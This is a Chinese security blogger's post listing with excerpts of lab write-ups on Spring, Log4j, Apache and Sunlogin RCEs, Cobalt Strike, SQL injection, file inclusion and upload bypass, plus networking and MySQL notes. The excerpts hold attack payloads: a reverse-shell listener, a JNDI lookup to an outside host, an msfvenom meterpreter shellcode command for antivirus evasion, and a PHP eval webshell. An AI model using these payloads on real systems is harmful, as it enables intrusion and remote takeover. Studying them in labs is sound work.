- 博客(33)
- 收藏
- 关注
RSS订阅原创 Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
启动vulhub docker环境:访问:http://192.168.29.130:8080/Kali攻击机创建url.txt文件加入url检测漏洞:利用工具POC进行探查是否存在SPEL漏洞python Spel_RCE_POC.py url.txt存在漏洞的url会显示到succ.txt中反弹shell工具:Kali机开启1207端口监听:nc -lvp 1207执行反弹shell pocpython Spel_RCE_Bas.
2022-04-19 16:26:46
3127
原创 Spring Framework RCE 通过 JDK 9+ 上的数据绑定 (CVE-2022-22965)
参考Vulhub链接:Vulhub - Docker-Compose file for vulnerability environment正常启用vulhub环境手工:访问:http://192.168.29.130:8080/构造payload:发送GET请求:http://192.168.29.130:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%..
2022-04-18 15:23:23
327
原创 Apache漏洞汇总:
Apache HTTPD 换行解析漏洞(CVE-2017-15715):访问ip:8080上传1.php正常被拦截查看hex:找到1.php后缀p后缀为70,0a0d为换行,因此在0d之前加入0a右键0d:Insert byte上传成功,访问http:ip:8080/%0a获取后台权限:...
2022-03-22 13:23:57
10170
原创 向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
目录漏洞描述:工具复现:CS服务器上线:(失败)漏洞描述:上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。影响版本:向日葵个人版 for Windows <= 11.0.0.33向日葵简约版 <= V1.0.1.43315(2021.12)工具复现:同一局域网:攻击机:172.5
2022-03-19 11:23:59
1224
原创 CSAgent 服务器搭建
目录1、目录结构2、启动CSAgent3、参数介绍:coball Strike:视图:View:攻击: Attacks:报告:Reporting:帮助:Help:4、简单复现运用:凭证提权:浏览探测:代理转发:会话操作:会话交互:资源下载:1、目录结构agscript 拓展应用的脚本c2lint 用于检查 profile 的错误异常teamserver 服务...
2022-03-19 00:31:59
2260
原创 Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
Log4j2端口3839页面http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1去提交dnslog payload参数:http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn}Dnslog中检测到信息,.
2022-03-17 18:22:10
6028
原创 Vulhub漏洞环境安装
配置apt install下载源(后可直接使用apt进行下载其他软件) sudo add-apt-repository ppa:costamagnagianfranco/ettercap-stable-backports sudo apt-get update一键安装docker: curl -s https://get.docker.com/ | sh安装pip apt install python3-pip 或curl -s https://bootstrap....
2022-03-17 16:58:24
1899
原创 sql注入实验
实验目的使学员了解SQL注入的原理和利用方法实验内容实验靶机URL:http://10.110.2.145:8008/通过手工注入获取admin账户的密码 实验过程进行截图,要求必须要有payload和结果截图实验过程截图SQL手工注入http://10.110.2.145:8008/article.php?id=1 and 1=1 #有回显http://10.110.2.145:8008/article.php?id=1 and 1=2 #无...
2022-02-24 19:59:34
1376
原创 Cuiri免杀绕过
Cuiri免杀绕过:https://github.com/NyDubh3/CuiRiMetasploit生成木马: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.128 lport=3333 -f c #导出C语言的shellcode 监听语句:handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.52.128 ...
2021-11-26 15:42:56
954
1
原创 渗透题(主要目录、密码爆破、数据库上传木马)
题目:给网址进行渗透分析http://192.168.129.129/nmap进行端口扫描使用御剑进行后台目录扫描进入80端口页面,发现是登陆界面使用burpsuite进行密码爆破可以看到Basci编码:YWRtaW46MTE=解码为admin:11type选择Custom iteratorPlayload Processing选择encode-Base64...
2021-06-29 23:07:24
545
1
原创 文件包含题型
可以看到有file关键词可以进行php伪协议:使用file伪协议查看/etc/passwd?file=file:///etc/passwdhttp://192.168.129.128:83/vulnerabilities/fu1.php?file=file:///etc/passwd使用php://input伪协议去查看ls /?file=php:input(Post Data)<?php phpinfo()?>http://192.168.129.1..
2021-06-27 15:36:07
197
2
原创 文件上传题型
题目:通过你所学到的知识,测试其过WAF滤规则,突破上传获取webshell,答案就在根目录下key.php文件中。先去上传1.php文件,里面编写一句话木马:<?php eval($_POST[c]);?>通过抓包来获取内容,发现并没有上传成功通过后缀名绕过上传:失败通过内容头部绕过:成功去访问上传的路径:http://192.168.129.128:82/vulnerabilities/1.phtml使用蚁剑webshell进行连接:http:/..
2021-06-27 15:06:02
757
原创 SQL注入题型(手工注入+sqlmap)
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件目录题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入)用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union)发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。首先进行手工注入(用’以及and或者or来进行查看是否可以
2021-06-27 00:15:07
1300
原创 linux搭建本地DNS服务器
安装bind包: yum install bind -y进入主配置文件:vim /etc/named.conf更改配置(可备份以前的.conf配置文件)options { #定义监听端口,如果所有地址都监听,则只写端口 listen-on port 53 { 172.52.16.30; }; directory "/var/named"; ...
2021-06-25 23:32:31
329
原创 linux搭建HTTPS静态web
<Directory /www> AllowOverride none Require all granted</Directory><VirtualHost 172.52.16.30:443> DocumentRoot /www/443 ServerName www.zbt.com SSLEngine on SSLProtocol all -SSLv2 .
2021-06-21 12:59:28
485
原创 linux搭建静态及用户访问控制
<Directory /www> AllowOverride none ----允许覆盖 Require all granted ----设置访问目录权限</Directory><VirtualHost (本地ip):80> DocumentRoot /www ----指定当前主机访问网站根目录 ServerName www.zbt.com ----指定访问网站名...
2021-06-21 00:11:05
553
原创 LVM管理练习
题目:1.添加一个 swap 分区在您的系统中添加一个新的 swap 分区,并满足以下要求: swap 分区容量为 512 MiB 当您的系统启动时,swap 分区应该可以开机自动挂载 不要移除或者修改其他已经存在于您的系统中的 swap 分区 2.创建一个逻辑卷请按下列要求创建一个新的逻辑卷: 创建一个名为 datastore 的卷组,卷组的大小为4G 逻辑卷的名字为 database ,所属...
2021-05-30 22:20:58
127
原创 双向重发步实验
R1[r1]rip 1[r1-rip-1]version 2[r1-rip-1]undo summary[r1-rip-1]network 12.0.0.0[r1-rip-1]network 14.0.0.0[r1-rip-1]network 1.0.0.0R2[r2]RIP 1[r2-rip-1]version 2[r2-rip-1]undo summary[r2-rip-1]network 12.0.0.0[r2-...
2020-12-07 12:19:37
126
原创 HCIP_MGRE综合实验
各路由器地址配上、网段分好 如图所示每个路由器缺省只出公网ip route-staic 0.0.0.0 0 21.1.1.1(其他类似)中心站点配置R1interface Tunnel0/0/0 创建tunnel口ip address 10.1.1.1 255.255.255.0 配置接口ip地址tunnel-protocol gre p2mp 先修改接口模式为多点GREsource 21.1.1.2 再定义公有的源IP地址nhrp entry multicast ...
2020-11-29 10:48:21
359
原创 HCIP_OSPF不规则区域
配地址:启ospf:R1: ospf 1 router-id 1.1.1.1 area 0 network 12.1.1.0 0.0.0.255 network 1.1.1.1 0.0.0.0 (其他类似)-------------------------------------------------------------通隧道 R2----R4(接口必须在同一个区域1内)[r2]interface Tunnel 0/0/0[r2-Tunnel0/0/...
2020-11-27 19:02:07
64
原创 HCIP_MGRE实验
[r1]interface Serial 4/0/0[r1-Serial4/0/0]link-protocol hdlc[r2]interface Serial 4/0/0[r2-Serial4/0/0]link-protocol hdlc------------------------------------------------------------------[R2]aaa 主认证方—服务端[R2-aaa]local-user bt password ci...
2020-11-26 16:19:26
127
原创 HCIP_静态大实验
(注:4台PC没有用DHCP来分配)基于192.168.0.0/24来分配192.168.00000000.00 000000总共为3大段(借2位)192.168.0.64/26 ——环回:分三个换回(借2位) |-192.168.0.01 00 0000 192.168.0.64/28 192.168.0.80/28 192.168.0.96/28192.168.0.128/26 ——主干:分六段(借3位) |-192.168.0.1...
2020-11-22 00:59:14
197
原创 Msql查询练习3
作业1:创建俩个用户, 第一个具有查询权限,完成某张表的查询grant select on db_zbt.* to zbt@'%' identified by 'root';第二个具有所有权限,完成从数据库创建,到表创建,crud,删除表,删除数据库grant all on *.* to syt@'%' identified by 'root';删除俩个用户 drop user zbt;Query OK, 0 rows affected (0.00 sec) ...
2020-10-13 11:32:20
971
原创 Mysql查询练习
作业: 一、单表查询 素材: 表名:worker-- 表中字段均为中文,比如 部门号 工资 职工号 参加工作 等 CREATE TABLE `worker` ( `部门号` int(11) NOT NULL, `职工号` int(11) NOT NULL, `工作时间` date NOT NULL, `工资` float(8,2) NOT NULL, `政治面貌` varchar(10) NOT NULL DEFAULT '...
2020-10-07 10:44:45
247
原创 Mysql_数据库数据初级总结(续)
Mysql数据库数据增删改查设 :create database db_books default character set utf8mb4 collate utf8mb4_general_ci; ##建db_books数据库设置use db_books ##进入db_bookscreate table t_hero( ##建t_hero表 id int primary key auto_increment,...
2020-09-28 20:43:05
242
原创 用python 循环108次数据库表中信息
yum install python3 pip3 ------安装pippip3 install PyMySQL --安装PyMyMQLyum install nano --安装nano编辑器(编辑python)nano app.py --进入app.py文件编译anao app.py import pymysql db = pymysql.connect("localhost","root","zbt199912","db_books") #...
2020-09-27 01:45:40
357
原创 LINUX四种方式安装mysql
源码安装MySQL:1.安装开发工具和开发包yum install make gcc gcc-c++ cmake bison-devel ncurses-develyum install libaio libaio-devel openssl-develyum install perl-Data-Dumperyum install net-tools2.解压tar xvf mysql-boost-5.7.14.tar.gz -C /ruanjian/mysql(先创建mysql...
2020-09-25 20:17:41
166
原创 MySQL 在Windows下 安装配置
(一)安装过程官网https://www.mysql.com/downloads/下载适合自己电脑的版本,download页面拉到最下方,下载社区版 将压缩包解压缩到自己想放置的位置,此时的mysql的目录结构。 到C:\Windows\System32下找到cmd.exe,一定要以管理员身份运行!!! cmd中进入mysql安装的bin目录下,输入mysqld –install安装mysql服务。 输入mysqld --initialize初始化,初始化之后mysql安装目录下会产生data文
2020-09-20 16:11:12
88
原创 CCNP_BT-重发布
由上图所示 分配 各路由器 ip地址由此之前,我们在没重发布之前, R1:只有直连以及RIP表中的路由 R3:只有直连以及OSPF表中的路由而 R2、R4:的表是完整的。 理想重发布之后: RIP区域去往OSPF区域都为负载均衡 OSPF区域去往RIP区域都为负载均衡注:先把OSPF里的环回类型改为Point - to - ...
2019-11-23 16:18:55
201
原创 CCNP_BT-OSPF大实验(1)
给各个路由器及接口配IP地址R1路由器:r2(config)#interface fastEthernet 0/0r2(config-if)#ip address 172.16.1.1 255.255.255.0r2(config-if)#no shutdownr2(config-if)#exitR2、R3...R12全部配完地址注意:R4为ISP 使用公网地址...
2019-11-21 00:55:17
176
原创 CCNP_总结 (续)
目录NA回顾:OSI七层参考模型(Open System Interconnect) 即开放式系统互联TCP/IP协议栈:ARP代理:数据包:工作过程:路由器作为DHCP服务器:静态路由:二层技术:一、以太网:共享型网络---频分---在线缆上使用不冲突的不同波段频率来叠加带宽二、HDLC 高级链路控制协议 --- 点到点网络类型---没有二层地址,仅连...
2019-11-07 09:27:40
1152
原创 CCNP_BT-MGRE
R1:静态配置R1(config)#int s2/0R1(config-if)#ip address 14.1.1.2 255.255.255.0R1(config-if)#no shutdownR1(config)#int s2/1R1(config-if)#ip address 15.1.1.1 255.255.255.0R1(config-if)#no ...
2019-11-06 14:00:27
121
原创 CCNP_BT-静态路由
R1路由器: 1.配置dhcp下发俩个网段(172.16.1.0/24,172.16.2.0/24) 汇总网段(172.16.0.0/22)r1(config)# ip dhcp pool bt1r1(dhcp-config)# network 172.16.1.0 255.255.255.0r1(dhcp-config)#default-router 172...
2019-11-02 11:35:19
254
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人